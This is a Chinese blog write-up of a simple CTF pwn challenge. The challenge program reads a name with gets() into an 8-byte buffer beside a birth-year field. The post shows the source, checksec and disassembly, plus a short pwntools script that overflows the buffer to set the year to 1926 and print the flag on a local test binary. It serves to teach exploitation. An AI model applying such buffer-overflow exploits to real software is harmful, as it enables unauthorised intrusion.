When Did You Born
2018/03/21 Pwn 栈溢出 南邮CTF

南邮CTF的一道简单pwn100题目

题目信息

  • 题目提供了源文件 可以看下代码了解流程

#include <stdio.h>

struct Student {
    char name[8];
    int birth;
};

int main(void) {
    struct Student student;
    printf("What\'s Your Birth?\n");
    scanf("%d", &student.birth);
    while (getchar() != '\n') ;
    if (student.birth == 1926) {
        printf("You Cannot Born In 1926!\n");
        return 0;
    }
    printf("What\'s Your Name?\n");
    gets(student.name);
    printf("You Are Born In %d\n", student.birth);
    if (student.birth == 1926) {
        printf("You Shall Have Flag.\n");
        system("cat flag");
    } else {
        printf("You Are Naive.\n");
        printf("You Speed One Second Here.\n");
    }
    return 0;
}

主要流程再讲得输入一个birth 如果birth=1926就能getflag 但是直接输入1926就结束程序

可以很容易的发现gets函数没有做任何限制

ios@ubuntu:~$ checksec test
[*] '/home/ios/test'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
ios@ubuntu:~$

栈溢出保护开启 NX开启

使用objdump -S test -M intel 来查看相关汇编指令

40073e:    48 89 45 f8              mov    QWORD PTR [rbp-0x8],rax
400742:    31 c0                    xor    eax,eax
400744:    bf 94 08 40 00           mov    edi,0x400894
400749:    e8 62 fe ff ff           call   4005b0 <puts@plt>
40074e:    48 8d 45 e0              lea    rax,[rbp-0x20]
400752:    48 83 c0 08              add    rax,0x8
400756:    48 89 c6                 mov    rsi,rax
400759:    bf a7 08 40 00           mov    edi,0x4008a7
40075e:    b8 00 00 00 00           mov    eax,0x0
400763:    e8 c8 fe ff ff           call   400630 <__isoc99_scanf@plt>
400768:    90                       nop
400769:    e8 92 fe ff ff           call   400600 <getchar@plt>
40076e:    83 f8 0a                 cmp    eax,0xa
400771:    75 f6                    jne    400769 <main+0x3c>
400773:    8b 45 e8                 mov    eax,DWORD PTR [rbp-0x18]
400776:    3d 86 07 00 00           cmp    eax,0x786
40077b:    75 11                    jne    40078e <main+0x61>
40077d:    bf aa 08 40 00           mov    edi,0x4008aa
400782:    e8 29 fe ff ff           call   4005b0 <puts@plt>
400787:    b8 00 00 00 00           mov    eax,0x0
40078c:    eb 68                    jmp    4007f6 <main+0xc9>
40078e:    bf c3 08 40 00           mov    edi,0x4008c3
400793:    e8 18 fe ff ff           call   4005b0 <puts@plt>
400798:    48 8d 45 e0              lea    rax,[rbp-0x20]

可以看出 .birth地址位于[rbp-0x20+0x8] 而 .name地址位于[rbp-0x20]

所以在gets函数处输入0x8字节就可以达到.birth地址

构造exp

from pwn import *

p = process('./test')

payload='A'*8+p64(1926)

p.sendline('ios')
print p.recv()
p.sendline(payload)
print p.recv()
print p.recv()

由于是在本地测试 就自己建了个flag

测试结果

ios@ubuntu:~$ python test.py
[+] Starting local process './test': pid 3064
What's Your Birth?
What's Your Name?

You Are Born In 1926
You Shall Have Flag.

[*] Stopped process './test' (pid 3064)
ios@ubuntu:~$ python test.py
[+] Starting local process './test': pid 3078
What's Your Birth?
What's Your Name?

You Are Born In 1926
You Shall Have Flag.

oh! you get this flag!

[*] Process './test' stopped with exit code 0 (pid 3078)
请杯咖啡呗~
支付宝
微信
Jarvis OJ Pwn writeup
关于hexo添加图片的问题
本文作者:ios
永久链接:http://iosmosis.github.io/2018/03/21/When-Did-You-Born/
版权声明:本文首发于ios的博客,转载请注明出处!
ios
Category
Tag cloud
AI外挂 About Me BUPT CTFwiki Fastbin_Attack Getshell Heap Hexo Jarvis OJ MISC NPUCTF Pwn RE ROP ROPgadget
Toc
  1. 题目提供了源文件 可以看下代码了解流程
  2. 主要流程再讲得输入一个birth 如果birth=1926就能getflag 但是直接输入1926就结束程序
  3. 可以很容易的发现gets函数没有做任何限制
  4. 栈溢出保护开启 NX开启
  5. 使用objdump -S test -M intel 来查看相关汇编指令
  6. 可以看出 .birth地址位于[rbp-0x20+0x8] 而 .name地址位于[rbp-0x20]
  7. 所以在gets函数处输入0x8字节就可以达到.birth地址
  8. 构造exp
  9. 由于是在本地测试 就自己建了个flag
  10. 测试结果